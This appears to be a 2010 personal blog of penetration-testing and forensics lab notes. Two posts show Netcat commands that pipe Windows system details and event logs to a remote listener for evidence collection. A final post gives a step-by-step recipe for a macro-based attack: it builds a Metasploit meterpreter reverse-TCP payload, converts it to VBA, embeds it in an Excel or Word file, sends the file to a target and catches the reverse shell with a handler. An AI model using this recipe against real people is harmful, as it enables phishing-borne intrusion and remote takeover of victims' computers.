Monday, July 26, 2010

My Personal Blog Moved!

Dear All,

As of today. My personal blog has been moved to http://flexi-learn.blogspot.com
New posts will be updated soonest possible.

Thursday, June 24, 2010

Covert Analysis II (Forensics)

On LON-WEB1, open the Event Viewer mmc snap-in, select System Event then select Save Logfile As, save the system event with another name:
Example: C:\Backup\SysEvent-Backup.evt

from LON-WEB1, send the SysEvent-Backup.evt file to CHFI-XP2 machine:

D:\Forensics\Netcat>
nc -v 131.107.1.254 99 < C:\Backup\SysEvent-Backup.evt

from CHFI-XP2 machine, receive the file:

C:\Tools\Netcat>
nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt


To analyze:

On CHFI-XP2, open Event Viewer and load the file to view the events.

Overt Analysis (Forensics)

Use mmc on the CHFI-XP2 machine and connect to the evidence machine (LON-WEB1).

Launch the mmc with runas:

C:\>runas /user:LON-WEB1\administrator "mmc"

Once mmc has been launch, connect to the evidence machine.

Link:
Forensics Acquisition Utility (FAU)
http://gmgsystemsinc.com/fau/

Covert Analysis I (Forensics)

On CHFI-XP2, launch Netcat in Listening Mode:

C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt

On LON-WEB1, launch Netcat in Client Mode:

D:\Forensics\Netcat>date /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>time /t | nc 131.107.1.254 99 -w10

D:\Forensics\Netcat>ipconfig /all | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>netstat -an | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>arp -a | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>route print | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>tasklist | nc 131.107.1.254 99 -w10

Display registry values:

D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 131.107.1.254 99 -w10

If you need to launch Netcat from different directory,
access it by using this command:

D:\Forensics\>cd Sysinternalssuite

D:\Forensics\Sysintenalssuite>pslist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloggedon | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloglist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psservice | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psfile | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>pipelist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>listdlls | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>procfeatures | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10

MyEvidence.txt is the file which will store the evidence collection.

Forensics Useful Links

http://www.foundstone.com/us/resources-free-tools.asp
http://www.nu2.nu/pebuilder/
http://portableapps.com/
http://www.e-fense.com/products.php
http://forensic.seccure.net/
http://gmgsystemsinc.com/fau/

Tuesday, May 18, 2010

Client-side Attack by Using Evil MS-Office Apps (Excel or Word)

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe

Step 2: Convert your newly created payload to VBA (Visual Basic for Application) script

cd /pentest/exploits/framework3/tools

./exe2vba.rb /tmp/payload.exe /tmp/payload.vba

Step 3: Copy and Paste the contents of the payload to your evil file

Open your evil file (Excel or Word). Select: Tools > Macro > Visual Basic Editor, paste the contents of your payload.vba, then save the file.

Step 4: Send the evil file to your client

Step 5: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit